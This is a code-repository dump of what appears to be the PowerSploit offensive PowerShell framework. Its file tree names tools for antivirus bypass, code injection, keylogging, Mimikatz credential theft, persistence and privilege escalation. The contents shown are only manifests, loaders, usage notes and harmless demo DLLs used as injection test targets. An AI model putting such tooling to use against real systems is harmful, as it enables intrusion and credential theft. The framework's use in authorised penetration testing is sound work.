├── .gitignore
├── AntivirusBypass
├── AntivirusBypass.psd1
├── AntivirusBypass.psm1
├── Find-AVSignature.ps1
└── Usage.md
├── CodeExecution
├── CodeExecution.psd1
├── CodeExecution.psm1
├── Invoke-DllInjection.ps1
├── Invoke-ReflectivePEInjection.ps1
├── Invoke-ReflectivePEInjection_Resources
│ ├── DemoDLL
│ │ ├── DemoDLL.sln
│ │ └── DemoDLL
│ │ │ ├── DemoDLL.cpp
│ │ │ ├── DemoDLL.h
│ │ │ ├── DemoDLL.vcxproj
│ │ │ ├── DemoDLL.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoDLL_RemoteProcess
│ │ ├── DemoDLL_RemoteProcess.sln
│ │ └── DemoDLL_RemoteProcess
│ │ │ ├── DemoDLL_RemoteProcess.cpp
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj
│ │ │ ├── DemoDLL_RemoteProcess.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── dllmain.cpp
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── DemoExe
│ │ ├── DemoExe.sln
│ │ ├── DemoExe_MD
│ │ │ ├── DemoExe_MD.cpp
│ │ │ ├── DemoExe_MD.vcxproj
│ │ │ ├── DemoExe_MD.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ │ └── DemoExe_MDd
│ │ │ ├── DemoExe_MDd.cpp
│ │ │ ├── DemoExe_MDd.vcxproj
│ │ │ ├── DemoExe_MDd.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ ├── ExeToInjectInTo
│ │ ├── ExeToInjectInTo.sln
│ │ └── ExeToInjectInTo
│ │ │ ├── ExeToInjectInTo.cpp
│ │ │ ├── ExeToInjectInTo.vcxproj
│ │ │ ├── ExeToInjectInTo.vcxproj.filters
│ │ │ ├── ReadMe.txt
│ │ │ ├── stdafx.cpp
│ │ │ ├── stdafx.h
│ │ │ └── targetver.h
│ └── Shellcode
│ │ ├── readme.txt
│ │ ├── x64
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ ├── GetFuncAddress.asm
│ │ └── LoadLibraryA.asm
│ │ └── x86
│ │ ├── CallDllMain.asm
│ │ ├── ExitThread.asm
│ │ └── GetProcAddress.asm
├── Invoke-Shellcode.ps1
├── Invoke-WmiCommand.ps1
└── Usage.md
├── Exfiltration
├── Exfiltration.psd1
├── Exfiltration.psm1
├── Get-GPPAutologon.ps1
├── Get-GPPPassword.ps1
├── Get-Keystrokes.ps1
├── Get-MicrophoneAudio.ps1
├── Get-TimedScreenshot.ps1
├── Get-VaultCredential.ps1
├── Get-VaultCredential.ps1xml
├── Invoke-CredentialInjection.ps1
├── Invoke-Mimikatz.ps1
├── Invoke-NinjaCopy.ps1
├── Invoke-TokenManipulation.ps1
├── LogonUser
│ └── LogonUser
│ │ ├── LogonUser.sln
│ │ ├── LogonUser
│ │ ├── LogonUser.cpp
│ │ ├── LogonUser.vcxproj
│ │ ├── LogonUser.vcxproj.filters
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ │ └── logon
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── logon.cpp
│ │ ├── logon.vcxproj
│ │ ├── logon.vcxproj.filters
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── NTFSParser
│ ├── NTFSParser.sln
│ ├── NTFSParser
│ │ ├── NTFS.h
│ │ ├── NTFSParser.cpp
│ │ ├── NTFSParser.vcxproj
│ │ ├── NTFSParser.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
│ └── NTFSParserDLL
│ │ ├── NTFS.h
│ │ ├── NTFSParserDLL.cpp
│ │ ├── NTFSParserDLL.vcxproj
│ │ ├── NTFSParserDLL.vcxproj.filters
│ │ ├── NTFS_Attribute.h
│ │ ├── NTFS_Common.h
│ │ ├── NTFS_DataType.h
│ │ ├── NTFS_FileRecord.h
│ │ ├── ReadMe.txt
│ │ ├── dllmain.cpp
│ │ ├── stdafx.cpp
│ │ ├── stdafx.h
│ │ └── targetver.h
├── Out-Minidump.ps1
├── Usage.md
└── VolumeShadowCopyTools.ps1
├── LICENSE
├── Mayhem
├── Mayhem.psd1
├── Mayhem.psm1
└── Usage.md
├── Persistence
├── Persistence.psd1
├── Persistence.psm1
└── Usage.md
├── PowerSploit.psd1
├── PowerSploit.psm1
├── PowerSploit.pssproj
├── PowerSploit.sln
├── Privesc
├── Get-System.ps1
├── PowerUp.ps1
├── Privesc.psd1
├── Privesc.psm1
└── README.md
├── README.md
├── Recon
├── Dictionaries
│ ├── admin.txt
│ ├── generic.txt
│ └── sharepoint.txt
├── Get-ComputerDetail.ps1
├── Get-HttpStatus.ps1
├── Invoke-CompareAttributesForClass.ps1
├── Invoke-Portscan.ps1
├── Invoke-ReverseDnsLookup.ps1
├── PowerView.ps1
├── README.md
├── Recon.psd1
└── Recon.psm1
├── ScriptModification
├── Out-CompressedDll.ps1
├── Out-EncodedCommand.ps1
├── Out-EncryptedScript.ps1
├── Remove-Comment.ps1
├── ScriptModification.psd1
├── ScriptModification.psm1
└── Usage.md
├── Tests
├── CodeExecution.tests.ps1
├── Exfiltration.tests.ps1
├── PowerSploit.tests.ps1
├── Privesc.tests.ps1
└── Recon.tests.ps1
├── docs
├── AntivirusBypass
│ └── Find-AVSignature.md
├── CodeExecution
│ ├── Invoke-DllInjection.md
│ ├── Invoke-ReflectivePEInjection.md
│ ├── Invoke-Shellcode.md
│ └── Invoke-WmiCommand.md
├── Mayhem
│ ├── Set-CriticalProcess.md
│ └── Set-MasterBootRecord.md
├── Persistence
│ ├── Add-Persistence.md
│ ├── Get-SecurityPackage.md
│ ├── Install-SSP.md
│ ├── New-ElevatedPersistenceOption.md
│ └── New-UserPersistenceOption.md
├── Privesc
│ ├── Add-ServiceDacl.md
│ ├── Enable-Privilege.md
│ ├── Find-PathDLLHijack.md
│ ├── Find-ProcessDLLHijack.md
│ ├── Get-ApplicationHost.md
│ ├── Get-CachedGPPPassword.md
│ ├── Get-ModifiablePath.md
│ ├── Get-ModifiableRegistryAutoRun.md
│ ├── Get-ModifiableScheduledTaskFile.md
│ ├── Get-ModifiableService.md
│ ├── Get-ModifiableServiceFile.md
│ ├── Get-ProcessTokenGroup.md
│ ├── Get-ProcessTokenPrivilege.md
│ ├── Get-RegistryAlwaysInstallElevated.md
│ ├── Get-RegistryAutoLogon.md
│ ├── Get-ServiceDetail.md
│ ├── Get-SiteListPassword.md
│ ├── Get-System.md
│ ├── Get-UnattendedInstallFile.md
│ ├── Get-UnquotedService.md
│ ├── Get-WebConfig.md
│ ├── Install-ServiceBinary.md
│ ├── Invoke-PrivescAudit.md
│ ├── Invoke-ServiceAbuse.md
│ ├── Invoke-WScriptUACBypass.md
│ ├── Restore-ServiceBinary.md
│ ├── Set-ServiceBinaryPath.md
│ ├── Test-ServiceDaclPermission.md
│ ├── Write-HijackDll.md
│ ├── Write-ServiceBinary.md
│ ├── Write-UserAddMSI.md
│ └── index.md
├── Recon
│ ├── Add-DomainGroupMember.md
│ ├── Add-DomainObjectAcl.md
│ ├── Add-RemoteConnection.md
│ ├── Convert-ADName.md
│ ├── ConvertFrom-SID.md
│ ├── ConvertFrom-UACValue.md
│ ├── ConvertTo-SID.md
│ ├── Export-PowerViewCSV.md
│ ├── Find-DomainLocalGroupMember.md
│ ├── Find-DomainObjectPropertyOutlier.md
│ ├── Find-DomainProcess.md
│ ├── Find-DomainShare.md
│ ├── Find-DomainUserEvent.md
│ ├── Find-DomainUserLocation.md
│ ├── Find-InterestingDomainAcl.md
│ ├── Find-InterestingDomainShareFile.md
│ ├── Find-InterestingFile.md
│ ├── Find-LocalAdminAccess.md
│ ├── Get-ComputerDetail.md
│ ├── Get-Domain.md
│ ├── Get-DomainComputer.md
│ ├── Get-DomainController.md
│ ├── Get-DomainDFSShare.md
│ ├── Get-DomainDNSRecord.md
│ ├── Get-DomainDNSZone.md
│ ├── Get-DomainFileServer.md
│ ├── Get-DomainForeignGroupMember.md
│ ├── Get-DomainForeignUser.md
│ ├── Get-DomainGPO.md
│ ├── Get-DomainGPOComputerLocalGroupMapping.md
│ ├── Get-DomainGPOLocalGroup.md
│ ├── Get-DomainGPOUserLocalGroupMapping.md
│ ├── Get-DomainGroup.md
│ ├── Get-DomainGroupMember.md
│ ├── Get-DomainManagedSecurityGroup.md
│ ├── Get-DomainOU.md
│ ├── Get-DomainObject.md
│ ├── Get-DomainObjectAcl.md
│ ├── Get-DomainPolicy.md
│ ├── Get-DomainSID.md
│ ├── Get-DomainSPNTicket.md
│ ├── Get-DomainSite.md
│ ├── Get-DomainSubnet.md
│ ├── Get-DomainTrust.md
│ ├── Get-DomainTrustMapping.md
│ ├── Get-DomainUser.md
│ ├── Get-DomainUserEvent.md
│ ├── Get-Forest.md
│ ├── Get-ForestDomain.md
│ ├── Get-ForestGlobalCatalog.md
│ ├── Get-ForestTrust.md
│ ├── Get-HttpStatus.md
│ ├── Get-NetComputerSiteName.md
│ ├── Get-NetLocalGroup.md
│ ├── Get-NetLocalGroupMember.md
│ ├── Get-NetLoggedon.md
│ ├── Get-NetRDPSession.md
│ ├── Get-NetSession.md
│ ├── Get-NetShare.md
│ ├── Get-PathAcl.md
│ ├── Get-RegLoggedOn.md
│ ├── Get-WMIProcess.md
│ ├── Get-WMIRegCachedRDPConnection.md
│ ├── Get-WMIRegLastLoggedOn.md
│ ├── Get-WMIRegMountedDrive.md
│ ├── Get-WMIRegProxy.md
│ ├── Invoke-Kerberoast.md
│ ├── Invoke-Portscan.md
│ ├── Invoke-ReverseDnsLookup.md
│ ├── Invoke-RevertToSelf.md
│ ├── Invoke-UserImpersonation.md
│ ├── New-DomainGroup.md
│ ├── New-DomainUser.md
│ ├── Remove-RemoteConnection.md
│ ├── Resolve-IPAddress.md
│ ├── Set-DomainObject.md
│ ├── Set-DomainObjectOwner.md
│ ├── Set-DomainUserPassword.md
│ ├── Test-AdminAccess.md
│ └── index.md
├── ScriptModification
│ ├── Out-CompressedDll.md
│ ├── Out-EncodedCommand.md
│ ├── Out-EncryptedScript.md
│ └── Remove-Comment.md
└── index.md
└── mkdocs.yml
/AntivirusBypass/AntivirusBypass.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'AntivirusBypass.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = '7cf9de61-2bfc-41b4-a397-9d7cf3a8e66b'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Copyright statement for this module
16 | Copyright = 'BSD 3-Clause'
17 |
18 | # Description of the functionality provided by this module
19 | Description = 'PowerSploit Antivirus Avoidance/Bypass Module'
20 |
21 | # Minimum version of the Windows PowerShell engine required by this module
22 | PowerShellVersion = '2.0'
23 |
24 | # Functions to export from this module
25 | FunctionsToExport = '*'
26 |
27 | # List of all files packaged with this module
28 | FileList = 'AntivirusBypass.psm1', 'AntivirusBypass.psd1', 'Find-AVSignature.ps1', 'Usage.md'
29 |
30 | }
31 |
--------------------------------------------------------------------------------
/AntivirusBypass/AntivirusBypass.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/AntivirusBypass/Usage.md:
--------------------------------------------------------------------------------
1 | To install this module, drop the entire AntivirusBypass folder into one of your module directories. The default PowerShell module paths are listed in the $Env:PSModulePath environment variable.
2 |
3 | The default per-user module path is: "$Env:HomeDrive$Env:HOMEPATH\Documents\WindowsPowerShell\Modules"
4 | The default computer-level module path is: "$Env:windir\System32\WindowsPowerShell\v1.0\Modules"
5 |
6 | To use the module, type `Import-Module AntivirusBypass`
7 |
8 | To see the commands imported, type `Get-Command -Module AntivirusBypass`
9 |
10 | For help on each individual command, Get-Help is your friend.
11 |
12 | Note: The tools contained within this module were all designed such that they can be run individually. Including them in a module simply lends itself to increased portability.
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psd1:
--------------------------------------------------------------------------------
1 | @{
2 |
3 | # Script module or binary module file associated with this manifest.
4 | ModuleToProcess = 'CodeExecution.psm1'
5 |
6 | # Version number of this module.
7 | ModuleVersion = '3.0.0.0'
8 |
9 | # ID used to uniquely identify this module
10 | GUID = 'a8a6780b-e694-4aa4-b28d-646afa66733c'
11 |
12 | # Author of this module
13 | Author = 'Matthew Graeber'
14 |
15 | # Company or vendor of this module
16 | CompanyName = ''
17 |
18 | # Copyright statement for this module
19 | Copyright = 'BSD 3-Clause'
20 |
21 | # Description of the functionality provided by this module
22 | Description = 'PowerSploit Code Execution Module'
23 |
24 | # Minimum version of the Windows PowerShell engine required by this module
25 | PowerShellVersion = '2.0'
26 |
27 | # Functions to export from this module
28 | FunctionsToExport = '*'
29 |
30 | # List of all files packaged with this module
31 | FileList = 'CodeExecution.psm1', 'CodeExecution.psd1', 'Invoke-Shellcode.ps1', 'Invoke-DllInjection.ps1',
32 | 'Invoke-ReflectivePEInjection.ps1', 'Invoke-WmiCommand.ps1', 'Usage.md'
33 | }
34 |
--------------------------------------------------------------------------------
/CodeExecution/CodeExecution.psm1:
--------------------------------------------------------------------------------
1 | Get-ChildItem (Join-Path $PSScriptRoot *.ps1) | % { . $_.FullName}
2 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 11.00
3 | # Visual Studio 2010
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL", "DemoDLL\DemoDLL.vcxproj", "{F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|Win32.Build.0 = Debug|Win32
16 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.ActiveCfg = Debug|x64
17 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Debug|x64.Build.0 = Debug|x64
18 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.ActiveCfg = Release|Win32
19 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|Win32.Build.0 = Release|Win32
20 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.ActiveCfg = Release|x64
21 | {F4F1D8EF-4069-40F3-9AAB-F75BAD26CBBA}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include "DemoDLL.h"
6 |
7 | using namespace std;
8 |
9 |
10 | extern "C" __declspec( dllexport ) char* StringFunc()
11 | {
12 | ostream *outputStream = NULL;
13 |
14 | //If you want to output to cout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to string or to cout.
15 | //outputStream = &cout;
16 |
17 | ostringstream *stringStream = new ostringstream();
18 | outputStream = stringStream;
19 |
20 | (*outputStream) << "String DLL function is working" << endl << endl;
21 |
22 | string output = (*stringStream).str();
23 | const char* outputStr = output.c_str();
24 |
25 | char* out = new char[output.size()+1];
26 | strcpy(out, outputStr);
27 | out[output.size()] = '\0';
28 |
29 |
30 | return out;
31 | }
32 |
33 | extern "C" __declspec( dllexport ) void VoidFunc()
34 | {
35 | printf("Void DLL function is working, using printf to display. You will only see this if you run locally.\n\n");
36 | return;
37 | }
38 |
39 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc()
40 | {
41 | wostream *outputStream = NULL;
42 |
43 | //If you want to output to wcout, simply set outputStream to &cout. This allows you to write a program that can switch between outputting to wstring or to wcout.
44 | outputStream = &wcout;
45 |
46 | wostringstream *stringStream = new wostringstream();
47 | outputStream = stringStream;
48 |
49 | (*outputStream) << L"WString DLL function is working" << endl << endl;
50 |
51 | wstring output = (*stringStream).str();
52 | const wchar_t* outputStr = output.c_str();
53 |
54 | wchar_t* out = new wchar_t[output.size()+1];
55 | wcscpy(out, outputStr);
56 | out[output.size()] = '\0';
57 |
58 |
59 | return out;
60 | }
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.h:
--------------------------------------------------------------------------------
1 | // The following ifdef block is the standard way of creating macros which make exporting
2 | // from a DLL simpler. All files within this DLL are compiled with the DEMODLL_EXPORTS
3 | // symbol defined on the command line. This symbol should not be defined on any project
4 | // that uses this DLL. This way any other project whose source files include this file see
5 | // DEMODLL_API functions as being imported from a DLL, whereas this DLL sees symbols
6 | // defined with this macro as being exported.
7 | #ifdef DEMODLL_EXPORTS
8 | #define DEMODLL_API __declspec(dllexport)
9 | #else
10 | #define DEMODLL_API __declspec(dllimport)
11 | #endif
12 |
13 | using namespace std;
14 |
15 | extern "C" __declspec( dllexport ) char* StringFunc();
16 | extern "C" __declspec( dllexport ) void VoidFunc();
17 | extern "C" __declspec( dllexport ) wchar_t* WStringFunc();
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 | Header Files
29 |
30 |
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL application.
9 |
10 |
11 | DemoDLL.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL.cpp
25 | This is the main DLL source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoDLL.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | BOOL APIENTRY DllMain( HMODULE hModule,
5 | DWORD ul_reason_for_call,
6 | LPVOID lpReserved
7 | )
8 | {
9 | switch (ul_reason_for_call)
10 | {
11 | case DLL_PROCESS_ATTACH:
12 | case DLL_THREAD_ATTACH:
13 | case DLL_THREAD_DETACH:
14 | case DLL_PROCESS_DETACH:
15 | break;
16 | }
17 | return TRUE;
18 | }
19 |
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 |
20 | // TODO: reference additional headers your program requires here
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoDLL_RemoteProcess", "DemoDLL_RemoteProcess\DemoDLL_RemoteProcess.vcxproj", "{3C031A7E-A99B-465E-ADF0-1350A94F1F5D}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Debug|x64 = Debug|x64
10 | Release|Win32 = Release|Win32
11 | Release|x64 = Release|x64
12 | EndGlobalSection
13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.ActiveCfg = Debug|Win32
15 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|Win32.Build.0 = Debug|Win32
16 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.ActiveCfg = Debug|x64
17 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Debug|x64.Build.0 = Debug|x64
18 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.ActiveCfg = Release|Win32
19 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|Win32.Build.0 = Release|Win32
20 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.ActiveCfg = Release|x64
21 | {3C031A7E-A99B-465E-ADF0-1350A94F1F5D}.Release|x64.Build.0 = Release|x64
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | EndGlobal
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.cpp:
--------------------------------------------------------------------------------
1 | // DemoDLL_RemoteProcess.cpp : Defines the exported functions for the DLL application.
2 | //
3 |
4 | #include "stdafx.h"
5 |
6 | using namespace std;
7 |
8 | extern "C" __declspec( dllexport ) void VoidFunc();
9 |
10 |
11 | extern "C" __declspec( dllexport ) void VoidFunc()
12 | {
13 | ofstream myfile;
14 | _mkdir("c:\\ReflectiveLoaderTest");
15 | myfile.open ("c:\\ReflectiveLoaderTest\\DllVoidFunction.txt");
16 | myfile << "Dll Void function successfully called.\n";
17 | myfile.close();
18 | return;
19 | }
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 | Source Files
37 |
38 |
39 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | DYNAMIC LINK LIBRARY : DemoDLL_RemoteProcess Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoDLL_RemoteProcess DLL for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoDLL_RemoteProcess application.
9 |
10 |
11 | DemoDLL_RemoteProcess.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoDLL_RemoteProcess.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoDLL_RemoteProcess.cpp
25 | This is the main DLL source file.
26 |
27 | When created, this DLL does not export any symbols. As a result, it
28 | will not produce a .lib file when it is built. If you wish this project
29 | to be a project dependency of some other project, you will either need to
30 | add code to export some symbols from the DLL so that an export library
31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General propert page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
6 | BOOL APIENTRY DllMain( HMODULE hModule,
7 | DWORD ul_reason_for_call,
8 | LPVOID lpReserved
9 | )
10 | {
11 | ofstream myfile;
12 |
13 | switch (ul_reason_for_call)
14 | {
15 | case DLL_PROCESS_ATTACH:
16 | _mkdir("c:\\ReflectiveLoaderTest");
17 | myfile.open ("c:\\ReflectiveLoaderTest\\DllMain.txt");
18 | myfile << "DllMain successfully called.\n";
19 | myfile.close();
20 | break;
21 | case DLL_THREAD_ATTACH:
22 | case DLL_THREAD_DETACH:
23 | case DLL_PROCESS_DETACH:
24 | break;
25 | }
26 | return TRUE;
27 | }
28 |
29 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
